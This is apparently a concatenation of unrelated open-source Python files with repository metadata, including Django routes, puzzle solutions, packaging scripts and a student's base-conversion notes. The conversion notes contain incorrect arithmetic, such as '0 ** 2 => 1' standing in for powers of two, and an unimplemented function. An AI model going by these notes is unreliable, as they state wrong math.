mlen = len(G[i])
root = i
nodes = [0] * n
q = deque()
q.append((root, -1))
while len(q) > 0:
v, fr = q.popleft()
for y, (w, _) in enumerate(G[v]):
color = 1
if w != fr:
if fr == -1:
print(v, w)
G[v][y][1] = color
elif G[v][fr][1] != color:
G[v][y][1] = color
else:
color += 1
G[v][w][1] = color
q.append((w, v))
color += 1
for i in range(n):
print(G[i])
if __name__ == '__main__':
main()
|
[
"teru0x01.sheep@gmail.com"
] |
teru0x01.sheep@gmail.com
|
efa66284d47dc7d43341155eaa34d87506ce3814
|
982344011a248b0f514ffb8d0c87c13f2f2e113e
|
/day1/conv.py
|
a03b4d03b507ada57975e15de49aabf5b16b5d56
|
[] |
no_license
|
patrickjwolf/CS32_Architecture_GP
|
7f6c68de92155b7b9b295f7d35413637cebce45a
|
8704add1c6ed1f917451544e1573bed005eaa3ac
|
refs/heads/master
| 2022-12-06T15:26:54.715887
| 2020-08-19T22:45:21
| 2020-08-19T22:45:21
| 288,225,480
| 0
| 0
| null | 2020-08-17T16:05:34
| 2020-08-17T16:05:33
| null |
UTF-8
|
Python
| false
| false
| 2,567
|
py
|
# In general, the `.format` method is considered more modern than the printf `%`
# operator.
# num = 123
# # Printing a value as decimal
# print(num) # 123
# print("%d" % num) # 123
# print("{:d}".format(num)) # 123
# print(f"{num:d}") # 123
# # Printing a value as hex
# print(hex(num)) # 0x7b
# print("%x" % num) # 7b
# print("%X" % num) # 7B
# print("%04X" % num) # 007B
# print(f"{num:x}") # 7b
# print(f"{num:X}") # 7B
# print(f"{num:04x}") # 007b
# # Printing a value as binary
# print("{:b}".format(num)) # 1111011, format method
"""
take input as a string
1111011
take input string
7b
turn in to a list
[1, 1, 1, 1, 0, 1, 1]
[7, b]
reverse the list
[1, 1, 0, 1, 1, 1, 1]
[b, 7]
multiply each element by its power of 2 respectively
1 * 1
1 * 2
0 * 4
1 * 8
1 * 16
1 * 32
1 * 64
b * 1 => 11
7 * 16 => 112
# taken the numbers and addedthem together
1 + 2 + 0 + 8 + 16 + 32 + 64
3 + 8 + 16 + 32 + 64
11 + 16 + 32 + 64
27 + 32 + 64
59 + 64
11 + 112
# returning a result in decimal
123
123
"""
# # Converting a decimal number in a string to a value
# s = "1234"; # 1234 is 0x4d2
# x = int(s); # Convert base-10 string to value
# # Printing a value as decimal and hex
# print(num) # 1234
# print(f"{num:x}") # 4d2
# # Converting a binary number in a string to a value
# s = "100101" # 0b100101 is 37 is 0x25
# x = int(s, 2) # Convert base-2 string to value
# # Printing a value as decimal and hex
# print(num) # 37
# print(f"{num:x}") # 25
# Conversion Python code:
# string1 = "10101010"
# 1 * 128
# 0 * 64
# 1 * 32
# 0 * 16
# 1 * 8
# 0 * 4
# 1 * 2
# 0 * 1
# reverse_string1 = "01010101"
# loop from 0 -> size of list - 1
# index = 0 -> 7
# base = 2
# index ** base
# 0 ** 2 => 1
# 1 ** 2 => 2
# 2 ** 2 => 4
# 3 ** 2 => 8
# 4 ** 2 => 16
# 5 ** 2 => 32
# 6 ** 2 => 64
# 7 ** 2 => 128
# multiplyer = 1 -> 128
# 0 * multiplyer
# 0 * 1 = 0
# 1 * 2 = 2
# 0 * 4 = 0
# 1 * 8 = 8
# 0 * 16 = 0
# 1 * 32 = 32
# 0 * 64 = 0
# 1 * 128 = 128
# value = 0
# value += 0
# value += 2
# value += 0
# value += 8
# value += 0
# value += 32
# value += 0
# value += 128
# ret value => 170
# [1, 0, 1, 0, 1, 0, 1, 0]
# [0, 1, 0, 1, 0, 1, 0, 1]
# digit_list[i] == 0
# + 0 * 1
# 0
# + 1 * 2
# 2
# 128 + 32 + 8 + 2
# Lets convert diferent bases to decimal
def to_decimal(num_string, base):
pass
print(to_decimal("7b", 16)) # => 123
print(to_decimal("010111010110101", 2)) # => 123
|
[
"tomtarpeydev@gmail.com"
] |
tomtarpeydev@gmail.com
|
3c62b147291c14be369f9d73ced805f7f8773c2f
|
5044413a31d50b8220c87ae02acc7b059c7bf5ec
|
/T2/KademliaLibrary/example/download.py
|
4be810183d08324cbd67d47e8459bd7b3f0cb044
|
[] |
no_license
|
rjherrera/IIC2523
|
500540350d06a1d11866093ec8d5df984728875c
|
756c4a3d9a59d72f66280333c8b48536c03ab592
|
refs/heads/master
| 2020-03-28T00:25:53.312660
| 2017-12-13T19:06:41
| 2017-12-13T19:06:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,207
|
py
|
from kademlia_iic2523.ipc import ipcSend
import requests
import socket
import sys
FILES_FOLDER = '/user/rjherrera/T2/files'
def download(url):
# try as we may recieve unexpected things. Also to use a friendly way of showing errors
try:
# use the requests library to try to download the file
r = requests.get(url, stream=True)
if r.status_code == 200:
# if we can we dump it to the desired location
with open('%s/%s' % (FILES_FOLDER, sys.argv[1]), 'wb') as f:
for chunk in r.iter_content(1024):
f.write(chunk)
return True
raise Exception(r.status_code)
except Exception as error:
print(error)
return False
def onResponse(message):
ip_address = socket.gethostbyname(socket.gethostname())
for url in message:
if download(url):
node_url = 'http://%s:11009/%s' % (ip_address, sys.argv[1])
# 'set' the file in our location (node_url) -> we are now registered as a server for it
ipcSend('set %s %s' % (sys.argv[1], node_url))
return
print('File not downloaded.')
ipcSend('get %s' % sys.argv[1], onResponse)
|
[
"rjherrera@uc.cl"
] |
rjherrera@uc.cl
|
2b206bd77e2c71810ed891c15081bb40dd02a4af
|
c05357142b9f112d401a77f9610079be3500675d
|
/danceschool/core/urls.py
|
acc3ba46762b7690b07c61b675bf598fcdb0daac
|
[
"BSD-3-Clause"
] |
permissive
|
NorthIsUp/django-danceschool
|
b3df9a9373c08e51fcaa88751e325b6423f36bac
|
71661830e87e45a3df949b026f446c481c8e8415
|
refs/heads/master
| 2021-01-02T22:42:17.608615
| 2017-08-04T17:27:37
| 2017-08-04T17:27:37
| 99,373,397
| 1
| 0
| null | 2017-08-04T19:21:50
| 2017-08-04T19:21:50
| null |
UTF-8
|
Python
| false
| false
| 2,997
|
py
|
from django.conf.urls import url
from django.contrib import admin
from .feeds import EventFeed, json_event_feed
from .views import SubmissionRedirectView, InstructorStatsView, OtherInstructorStatsView, IndividualClassView, IndividualEventView, StaffDirectoryView, EmailConfirmationView, SendEmailView, SubstituteReportingView, InstructorBioChangeView, AccountProfileView, OtherAccountProfileView
from .ajax import UserAccountInfo, updateSeriesAttributes, getEmailTemplate
from .autocomplete_light_registry import CustomerAutoComplete, UserAutoComplete
admin.autodiscover()
urlpatterns = [
# These URLs are for Ajax and autocomplete functionality
url(r'^staff/substitute/filter/$', updateSeriesAttributes, name='ajaxhandler_submitsubstitutefilter'),
url(r'^staff/sendemail/template/$', getEmailTemplate, name='ajaxhandler_getemailtemplate'),
url(r'^staff/autocomplete/user', UserAutoComplete.as_view(), name='autocompleteUser'),
url(r'^staff/autocomplete/customer', CustomerAutoComplete.as_view(), name='autocompleteCustomer'),
url(r'^accounts/info/$', UserAccountInfo.as_view(), name='getUserAccountInfo'),
# For general admin form submission redirects
url(r'^form/submitted/$', SubmissionRedirectView.as_view(), name='submissionRedirect'),
url(r'^staff/directory/$',StaffDirectoryView.as_view(),name='staffDirectory'),
url(r'^staff/sendemail/$', SendEmailView.as_view(),name='emailStudents'),
url(r'^staff/sendemail/confirm/$', EmailConfirmationView.as_view(),name='emailConfirmation'),
url(r'^staff/substitute/$', SubstituteReportingView.as_view(),name='substituteTeacherForm'),
# These provide the ability to view one's own stats or another instructor's stats
url(r'^staff/instructor-stats/(?P<first_name>[\w\+\.]+)-(?P<last_name>[\w\+\.]+)/$', OtherInstructorStatsView.as_view(), name='instructorStats'),
url(r'^staff/instructor-stats/$', InstructorStatsView.as_view(), name='instructorStats'),
# This provides the ability to edit one's own bio
url(r'^staff/bio/$', InstructorBioChangeView.as_view(), name='instructorBioChange'),
# These are for the calendar feeds
url(r'^events/feed/$', EventFeed(), name='calendarFeed'),
url(r'^events/feed/json/$', json_event_feed, name='jsonCalendarFeed'),
url(r'^events/feed/(?P<instructorFeedKey>[\w\-_]+)$', EventFeed(), name='calendarFeed'),
url(r'^events/feed/json/(?P<instructorFeedKey>[\w\-_]+)$', json_event_feed, name='jsonCalendarFeed'),
# These are for individual class views and event views
url(r'^classes/(?P<year>[0-9]+)/(?P<month>[\w]+)/(?P<slug>[\w\-_]+)/$', IndividualClassView.as_view(), name='classView'),
url(r'^events/(?P<year>[0-9]+)/(?P<month>[\w]+)/(?P<slug>[\w\-_]+)/$', IndividualEventView.as_view(), name='eventView'),
url(r'^accounts/profile/(?P<user_id>[0-9]+)/$', OtherAccountProfileView.as_view(), name='accountProfile'),
url(r'^accounts/profile/$', AccountProfileView.as_view(), name='accountProfile'),
]
|
[
"lee.c.tucker@gmail.com"
] |
lee.c.tucker@gmail.com
|
c32bf7266de063e1e276f4b6ab28ed930165b860
|
9f7d4d76c7e66aa424a5f8723575dc489f1fd2ab
|
/2022/15/15.py
|
7d6fdb456fc09a05011e86519edbfcdeac7af504
|
[
"MIT"
] |
permissive
|
kristianwiklund/AOC
|
df5a873287304816f25d91259c6e6c99c7a5f4bf
|
d9a668c406d2fd1b805d9b6a34cffa237a33c119
|
refs/heads/master
| 2023-01-12T09:01:11.012081
| 2023-01-02T19:12:29
| 2023-01-02T19:12:29
| 227,458,380
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,007
|
py
|
import sys
sys.path.append("../..")
from utilities import *
import networkx as nx
from copy import deepcopy
from pprint import pprint
arr = readarray("input.txt")
row = 2000000
#row=10
beac=list()
sens=list()
for l in arr:
x=int(l[2].split("=")[1].strip(","))
y=int(l[3].split("=")[1].strip(":"))
s=complex(x,y)
# print(s)
sens.append(s)
x=int(l[8].split("=")[1].strip(","))
y=int(l[9].split("=")[1].strip(":"))
b=complex(x,y)
# print(b)
beac.append(b)
print(sens)
# for each beacon
# identify the lines defining the area of the relevant beacon coverage
# project those lines on the line we want to look at
# the length of the line grows with +1 on each side from the center for each row above the furthest row
# the result is a set of lines showing what is covered
def cover(s,b,l):
d = int(abs(s.imag-b.imag)+abs(s.real-b.real))
if int(s.imag+d)<l:
return None
# d is the max distance where we have guaranteed no other beacons
# at that place, we have one single blob right below the sensor
# at position (s.real, s.imag+d)
# for each distance above this, we get an additional blob on the
# side
side = d-abs(s.imag-l)
if(side<0):
return None
# print("cover",s,b,"(s)",side,"<<",d,">>",(s.real - abs(side), s.real + abs(side)))
return (s.real - abs(side), s.real + abs(side))
def lineme(row):
line=list()
for i in range(len(sens)):
c = cover(sens[i],beac[i],row)
if c:
line.append(c)
line=sorted(line,key=lambda x:x[0])
return line
#print(mi,ma)
def yes(x, line):
for i in line:
if x>=i[0] and x<=i[1]:
return True
return False
def scoreme(line, maxx=None):
score=0
ma = max([int(y) for x,y in line])
if maxx:
ma = max(maxx,ma)
mi = min([int(x) for x,y in line])
for i in range(mi,ma):
if yes(i,line):
score+=1
if (ma-mi)<80:
print("#",end="")
else:
if (ma-mi)<80:
print(".",end="")
return score
print("")
line = lineme(row)
print("part 1:",scoreme(line))
def overlap(a,b):
if a==b:
return True
if a[0]>=b[0] and a[1]<=b[1]:
return True
else:
return False
def cm(a,b):
if a==b:
return 0
if a[0]==b[0]:
if a[1]==b[1]:
return 0
if a[1]<b[1]:
return -1
return 1
if a[0]<b[0]:
return -1
return 1
from functools import cmp_to_key
for i in range(0,4000000):
line = lineme(i)
line= sorted(list(line),key=cmp_to_key(cm))
x=0
for j in line:
if j[0]<x:
if j[1]<x:
continue
if j[0]-x == 2:
print ("part 2:", i+(x+1)*4000000,line)
import sys
sys.exit()
x=j[1]
if x>4000000:
break
|
[
"githubkristian@snabela.nl"
] |
githubkristian@snabela.nl
|
d2c84ea4ee599a3dca31d420a60f2e17b98158a9
|
fa2526ce1d65a2e58958a61c34cee1ba7cf73b94
|
/setup.py
|
958cccc8103c3d1f18213fd6d55c4f3cb9978257
|
[
"ZPL-2.1"
] |
permissive
|
Zojax/zojax.portlets.livesearch
|
c480a19bd57b8b348032e40203696e4c53c68347
|
95f117ce89e0dc1fbfefdbec7969170caa3a1caf
|
refs/heads/master
| 2020-12-30T10:36:43.760852
| 2011-08-09T22:33:26
| 2011-08-09T22:33:26
| 2,035,553
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,552
|
py
|
##############################################################################
#
# Copyright (c) 2008 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Setup for zojax.portlets.livesearch package
$Id$
"""
import sys, os
from setuptools import setup, find_packages
def read(*rnames):
return open(os.path.join(os.path.dirname(__file__), *rnames)).read()
version='1.0.0dev'
setup(name = 'zojax.portlets.livesearch',
version = version,
author = 'Nikolay Kim',
author_email = 'fafhrd91@gmail.com',
description = "Google Ads portlet",
long_description = (
'Detailed Documentation\n' +
'======================\n'
+ '\n\n' +
read('CHANGES.txt')
),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Zope Public License',
'Programming Language :: Python',
'Natural Language :: English',
'Operating System :: OS Independent',
'Topic :: Internet :: WWW/HTTP',
'Framework :: Zope3'],
url='http://zojax.net/',
license='ZPL 2.1',
packages=find_packages('src'),
package_dir = {'':'src'},
namespace_packages=['zojax', 'zojax.portlets'],
install_requires = ['setuptools', 'simplejson',
'zope.component',
'zope.interface',
'zope.schema',
'zope.i18nmessageid',
'zojax.catalog',
'zojax.portlet',
'zojax.ownership',
'zojax.formatter',
'zojax.ui.searching',
'zojax.js.extjs',
'zojax.resource',
'zojax.resourcepackage',
],
extras_require = dict(test=['zojax.portlet [test]']),
include_package_data = True,
zip_safe = False
)
|
[
"andrey.fedoseev@gmail.com"
] |
andrey.fedoseev@gmail.com
|
74da8fcf18ff9a8150ba39ee90f91be05dea8255
|
0b70b9f582d2b010305ad1e5e4885f30435a5a74
|
/GUEST/forms.py
|
ae9847e5b58e1badfbd1bde00f04d04ed4a557f7
|
[] |
no_license
|
SruthiSasidharan/DjangoProjects
|
51fa60282b398f4ebf03383220ce046ae1e1beed
|
6fccc3e1d571638949953ed9fc390068417ce713
|
refs/heads/master
| 2023-06-28T02:24:32.355568
| 2021-07-29T07:45:26
| 2021-07-29T07:45:26
| 370,647,670
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
from Guest import forms
from .models import Review
from django.forms import ModelForm
class ReviewCreateForm(forms.ModelForm):
class Meta:
model=Review
fields=["review"]
|
[
"you@example.com"
] |
you@example.com
|
5be8330c7a2af0ba0d2b7752a2f74e9b0b078107
|
f16e6cff9270ffece7f28473a46a49f76044eae1
|
/data_and_proc/sp2genus.py
|
4fcb8182b68b5087bea63b7412024f334e0a339a
|
[] |
no_license
|
Klim314/pubcrawl
|
fe9e0a4ad0df35367a685856edb7983453fda345
|
cd873d0741c6ed1a09867ce86077927afd7be450
|
refs/heads/master
| 2021-01-18T19:17:49.786829
| 2015-06-19T03:48:03
| 2015-06-19T03:48:03
| 35,801,951
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 305
|
py
|
#!/usr/bin/env python3
import sys
target = sys.argv[1]
output = sys.argv[2]
holder =set()
with open(target) as f:
for i in f:
splat = i.strip().split("\t")
holder.add((splat[0].split(' ')[0], splat[1].split(' ')[0]))
with open(output, 'w') as f:
for i in holder:
f.write(" ".join(i) + '\n')
|
[
"klim314@gmail.com"
] |
klim314@gmail.com
|
626ef1a1961641711c3f61312880cea3994ab7ea
|
8d55d3a52ed6dc8111801cea9c7c9d0a84be736b
|
/src/662.maximum-width-of-binary-tree.py
|
236e7d52ce3fdc75ebc2866c5c0b37f29a9c687d
|
[] |
no_license
|
mic0ud/Leetcode-py3
|
2a23270034ec470571e57c498830b93af813645f
|
61fabda324338e907ce3514ae8931c013b8fe401
|
refs/heads/master
| 2022-12-26T11:52:31.666395
| 2020-09-27T19:27:10
| 2020-09-27T19:27:10
| 297,135,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,889
|
py
|
#
# @lc app=leetcode id=662 lang=python3
#
# [662] Maximum Width of Binary Tree
#
# https://leetcode.com/problems/maximum-width-of-binary-tree/description/
#
# algorithms
# Medium (39.55%)
# Likes: 860
# Dislikes: 187
# Total Accepted: 45.6K
# Total Submissions: 115.4K
# Testcase Example: '[1,3,2,5,3,null,9]'
#
# Given a binary tree, write a function to get the maximum width of the given
# tree. The width of a tree is the maximum width among all levels. The binary
# tree has the same structure as a full binary tree, but some nodes are null.
#
# The width of one level is defined as the length between the end-nodes (the
# leftmost and right most non-null nodes in the level, where the null nodes
# between the end-nodes are also counted into the length calculation.
#
# Example 1:
#
#
# Input:
#
# 1
# / \
# 3 2
# / \ \
# 5 3 9
#
# Output: 4
# Explanation: The maximum width existing in the third level with the length 4
# (5,3,null,9).
#
#
# Example 2:
#
#
# Input:
#
# 1
# /
# 3
# / \
# 5 3
#
# Output: 2
# Explanation: The maximum width existing in the third level with the length 2
# (5,3).
#
#
# Example 3:
#
#
# Input:
#
# 1
# / \
# 3 2
# /
# 5
#
# Output: 2
# Explanation: The maximum width existing in the second level with the length 2
# (3,2).
#
#
# Example 4:
#
#
# Input:
#
# 1
# / \
# 3 2
# / \
# 5 9
# / \
# 6 7
# Output: 8
# Explanation:The maximum width existing in the fourth level with the length 8
# (6,null,null,null,null,null,null,7).
#
#
#
#
# Note: Answer will in the range of 32-bit signed integer.
#
#
# @lc code=start
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
from queue import Queue
class Solution:
def widthOfBinaryTree(self, root: TreeNode) -> int:
if not root:
return 0
q = Queue()
q.put([root])
res = 1
while True:
nodes = q.get()
next_ = []
i, start, end = 0, 0, 0
while i < len(nodes) and not nodes[i]:
i += 1
if i == len(nodes):
break
start, i = i, len(nodes)-1
while i > start and not nodes[i]:
i -= 1
end = i
res = max(res, end-start+1)
for k in range(start, end+1):
next_.append(nodes[k].left if nodes[k] else None)
next_.append(nodes[k].right if nodes[k] else None)
q.put(next_)
return res
# @lc code=end
|
[
"ebizui@gmail.com"
] |
ebizui@gmail.com
|
59a36d90be34893265567174228a0d09d2ef132f
|
bad62c2b0dfad33197db55b44efeec0bab405634
|
/sdk/ml/azure-ai-ml/azure/ai/ml/_schema/compute/usage.py
|
39e0151c3a84f06270af1fa3cdc4323d144b0afe
|
[
"LicenseRef-scancode-python-cwi",
"LGPL-2.1-or-later",
"PSF-2.0",
"LGPL-2.0-or-later",
"GPL-3.0-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"Python-2.0",
"MPL-2.0",
"LicenseRef-scancode-other-copyleft",
"HPND",
"ODbL-1.0",
"GPL-3.0-only",
"ZPL-2.1",
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
test-repo-billy/azure-sdk-for-python
|
20c5a2486456e02456de17515704cb064ff19833
|
cece86a8548cb5f575e5419864d631673be0a244
|
refs/heads/master
| 2022-10-25T02:28:39.022559
| 2022-10-18T06:05:46
| 2022-10-18T06:05:46
| 182,325,031
| 0
| 0
|
MIT
| 2019-07-25T22:28:52
| 2019-04-19T20:59:15
|
Python
|
UTF-8
|
Python
| false
| false
| 1,289
|
py
|
# ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
# pylint: disable=unused-argument,no-self-use
from marshmallow import fields
from marshmallow.decorators import post_load
from azure.ai.ml._restclient.v2021_10_01.models import UsageUnit
from azure.ai.ml._schema.core.fields import NestedField, StringTransformedEnum, UnionField
from azure.ai.ml._schema.core.schema_meta import PatchedSchemaMeta
from azure.ai.ml._utils.utils import camel_to_snake
class UsageNameSchema(metaclass=PatchedSchemaMeta):
value = fields.Str()
localized_value = fields.Str()
@post_load
def make(self, data, **kwargs):
from azure.ai.ml.entities import UsageName
return UsageName(**data)
class UsageSchema(metaclass=PatchedSchemaMeta):
id = fields.Str()
aml_workspace_location = fields.Str()
type = fields.Str()
unit = UnionField(
[
fields.Str(),
StringTransformedEnum(
allowed_values=UsageUnit.COUNT,
casing_transform=camel_to_snake,
),
]
)
current_value = fields.Int()
limit = fields.Int()
name = NestedField(UsageNameSchema)
|
[
"noreply@github.com"
] |
test-repo-billy.noreply@github.com
|
bed1f026290d30ab652af5f006794bd8fbc9f765
|
c71af56951d1c661a5819db72da1caccd9130df2
|
/python/utils/ad_tests_mover.py
|
589995b4d3a1d5c721e5c9a0815c477fcb302fc7
|
[] |
no_license
|
adrianpoplesanu/personal-work
|
2940a0dc4e4e27e0cc467875bae3fdea27dd0d31
|
adc289ecb72c1c6f98582f3ea9ad4bf2e8e08d29
|
refs/heads/master
| 2023-08-23T06:56:49.363519
| 2023-08-21T17:20:51
| 2023-08-21T17:20:51
| 109,451,981
| 0
| 1
| null | 2022-10-07T04:53:24
| 2017-11-03T23:36:21
|
Python
|
UTF-8
|
Python
| false
| false
| 457
|
py
|
limit = 95
def format_2digits(i):
if i < 10:
return "test0" + str(i)
else:
return "test" + str(i)
def format_3digits(i):
if i < 10:
return "test00" + str(i)
elif i < 100:
return "test0" + str(i)
else:
return "test" + str(i)
if __name__ == '__main__':
for i in range(1, limit + 1):
print ("mv " + format_2digits(i) + ".ad " + format_3digits(i) + ".ad ;")
print ("echo 'done'")
|
[
"adrian.poplesanu@yahoo.com"
] |
adrian.poplesanu@yahoo.com
|
ae269fbeb63c445ff3f0b9c7c9b142899a832f1f
|
f506dc8837e55dc1d8c023360d3395c1d24833e8
|
/prepare-dataset.py
|
0b3821e4fe3f99018e9f87a64387bf438986a1dc
|
[
"MIT"
] |
permissive
|
hommmm/ParallelTTS
|
0f82ed29cdad0441ce491987b72ef17027b48359
|
d0e967d6d471bc901c85181a3b734d4df445dd08
|
refs/heads/main
| 2023-04-24T05:34:10.327568
| 2021-04-15T06:37:29
| 2021-04-15T06:37:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,446
|
py
|
#!/usr/bin/env python
"""Download and preprocess datasets. Supported datasets are:
* English female: LJSpeech
* Mandarin female: BBSpeech (BIAOBEI)
* Tibetan female: TBSpeech (Non-public)
* Mongolian male: MBSpeech (Mongolian Bible)
* Korean female: KSSpeech (Kaggle Korean Single Speech)
* Cantonese male: HKSpeech (Common Voice, Hong Kong)
* Japanese female: JPSpeech (JSUT Speech Corpus)
"""
__author__ = 'Atomicoo'
import sys
import os
import os.path as osp
import argparse
import pandas as pd
from utils.hparams import HParam
from utils.utils import download_file
from helpers.processor import Processor
from datasets.dataset import SpeechDataset
parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--config', default=None, type=str, help='Config file path')
parser.add_argument('--compute', action='store_true', help='Pre-compute dataset statistics')
args = parser.parse_args()
hparams = HParam(args.config) \
if args.config else HParam(osp.join(osp.abspath(os.getcwd()), 'config', 'default.yaml'))
datasets_path = hparams.data.datasets_path
dataset_file_url = \
f'https://open-speech-data.oss-cn-hangzhou.aliyuncs.com/{hparams.data.dataset_dir}.tar.bz2'
dataset_file_name = osp.basename(dataset_file_url)
dataset_dir = dataset_file_name[:-8]
dataset_path = osp.join(datasets_path, dataset_dir)
wavfile_path = osp.join(dataset_path, "wavs")
melspec_path = osp.join(dataset_path, "mels")
if osp.isdir(melspec_path) and False:
print("%s dataset folder already exists" % dataset_dir)
sys.exit(0)
else:
dataset_file_path = osp.join(datasets_path, dataset_file_name)
if not osp.isfile(dataset_file_path):
download_file(dataset_file_url, dataset_file_path)
else:
print("'%s' already exists" % dataset_file_name)
if not osp.isdir(wavfile_path):
print("extracting '%s'..." % dataset_file_name)
os.system('cd %s; tar xvjf %s' % (datasets_path, dataset_file_name))
else:
print("'%s' already exists" % wavfile_path)
dataset_root = osp.join(hparams.data.datasets_path, hparams.data.dataset_dir)
dataset = SpeechDataset([], dataset_root, hparams.text)
processor = Processor(hparams=hparams.audio)
# pre process/compute
if args.compute:
processor.precompute(dataset_path, dataset)
else:
processor.preprocess(dataset_path, dataset)
|
[
"atomicoo95@gmail.com"
] |
atomicoo95@gmail.com
|
04dc23f98eeb652b65e913bb594e023fbe573c31
|
ce0f8956c4c308c67bd700d31fe8d5a17b16ac08
|
/Python3/src/14 Testing/TDD/point.py
|
5f5392393d0de4173dee22fb7258d9404262882e
|
[] |
no_license
|
seddon-software/python3
|
795ae8d22a172eea074b71d6cd49d79e388d8cc6
|
d5e6db1509a25c1a3040d5ae82d757539a2ff730
|
refs/heads/master
| 2021-07-10T15:48:31.893757
| 2020-07-16T20:29:22
| 2020-07-16T20:29:22
| 175,872,757
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 283
|
py
|
class Point:
def __init__(self, x0, y0, name):
self.x = x0
self.y = y0
self.name = name
def moveBy(self, dx, dy):
self.x += dx
self.y += dy
def display(self):
print(f"Point {self.name} is at [{self.x},{self.y}]")
|
[
"seddon-software@keme.co.uk"
] |
seddon-software@keme.co.uk
|
0eed8c89461eb6c3b8d3047d689917d934f242ea
|
edf125be37a40caeb14c7fe32bd9f7511cf0ce9b
|
/07-cleaning-data-in-python/5-case-study/checking_data_types.py
|
dbf0982d7a52005d2ab359bdf31bf73197f34252
|
[] |
no_license
|
vedpbharti/Datacamp
|
1d3d2ca0722a3a19733e91fa054f64e0c3b7114a
|
b6d019efebe1b46765f19212ba2d8ebb9d90de57
|
refs/heads/master
| 2020-04-05T05:47:28.528088
| 2019-02-10T22:34:00
| 2019-02-10T22:34:00
| 156,610,704
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,221
|
py
|
'''Checking the data types
Now that your data is in the proper shape, you need to ensure that the columns are of the proper data type. That is, you need to ensure that country is of type object, year is of type int64, and life_expectancy is of type float64.
The tidy DataFrame has been pre-loaded as gapminder. Explore it in the IPython Shell using the .info() method. Notice that the column 'year' is of type object. This is incorrect, so you'll need to use the pd.to_numeric() function to convert it to a numeric data type.
NumPy and pandas have been pre-imported as np and pd.
Instructions
100 XP
Convert the year column of gapminder using pd.to_numeric().
Assert that the country column is of type np.object. This has been done for you.
Assert that the year column is of type np.int64.
Assert that the life_expectancy column is of type np.float64.'''
# Convert the year column to numeric
gapminder.year = pd.to_numeric(gapminder['year'], errors='coerce')
# Test if country is of type object
assert gapminder.country.dtypes == np.object
# Test if year is of type int64
assert gapminder.year.dtypes == np.int64
# Test if life_expectancy is of type float64
assert gapminder.life_expectancy.dtypes == np.float64
|
[
"ved.bhartig@gmail.com"
] |
ved.bhartig@gmail.com
|
895a00118a48a46da43842ed361ef90b4bf75bc7
|
f023692f73992354a0b7823d9c49ae730c95ab52
|
/AtCoderRegularContest/109/B.py
|
e8f63dd4b86156a7a7784479c9988ed5e778177a
|
[] |
no_license
|
corutopi/AtCorder_python
|
a959e733f9a3549fab7162023e414ac2c99c4abe
|
a2c78cc647076071549e354c398155a65d5e331a
|
refs/heads/master
| 2023-08-31T09:40:35.929155
| 2023-08-20T06:19:35
| 2023-08-20T06:19:35
| 197,030,129
| 1
| 0
| null | 2022-06-22T04:06:28
| 2019-07-15T15:57:34
|
Python
|
UTF-8
|
Python
| false
| false
| 694
|
py
|
# import sys
# sys.setrecursionlimit(10 ** 6)
# import bisect
# from collections import deque
def binary_search(ok, ng, solve):
"""2分探索"""
while abs(ok - ng) > 1:
mid = (ok + ng) // 2
if solve(mid):
ok = mid
else:
ng = mid
return ok
# from decorator import stop_watch
#
#
# @stop_watch
def solve(n):
def solve(x):
if (x * (x + 1)) // 2 <= n + 1:
return True
return False
print(n - binary_search(1, n + 1, solve) + 1)
if __name__ == '__main__':
n = int(input())
solve(n)
# # test
# from random import randint
# from func import random_str, random_ints
# solve()
|
[
"39874652+corutopi@users.noreply.github.com"
] |
39874652+corutopi@users.noreply.github.com
|
03c7167733f235f4307297442c65882718598a6e
|
7b97d6fef74b35d2f26a9fed79b5b15782f8f9a5
|
/examples/basic_example.py
|
6ea409ffd7dddf1566fbada82d53d23511f7979b
|
[
"MIT"
] |
permissive
|
Edinburgh-Genome-Foundry/tatapov
|
22ac8e1fc506267a5d85f6063596485e9fdba9e4
|
06c2aa13e49affc7419e16e853d31c835813fe04
|
refs/heads/master
| 2023-09-03T22:28:55.443170
| 2022-05-06T13:41:32
| 2022-05-06T13:41:32
| 150,324,605
| 12
| 2
|
NOASSERTION
| 2020-09-08T23:31:43
| 2018-09-25T20:22:46
|
Python
|
UTF-8
|
Python
| false
| false
| 242
|
py
|
import tatapov
data = tatapov.annealing_data["25C"]["01h"]
subset = tatapov.data_subset(data, ["ACGA", "AAAT", "AGAG"], add_reverse=True)
ax, _ = tatapov.plot_data(subset, figwidth=5)
ax.figure.tight_layout()
ax.figure.savefig("example.png")
|
[
"valentin.zulkower@gmail.com"
] |
valentin.zulkower@gmail.com
|
7ae787bca6218c85ab763ed18d5cc546dd7a9f72
|
866418a05db550487e5eb6f5063f04f1241ccb4a
|
/example/11/╡┌11.3_1.py
|
39c0355ca01e72cc70a9202afd65d0b91cafe609
|
[] |
no_license
|
Freshield/LEARN_Python_Crawler
|
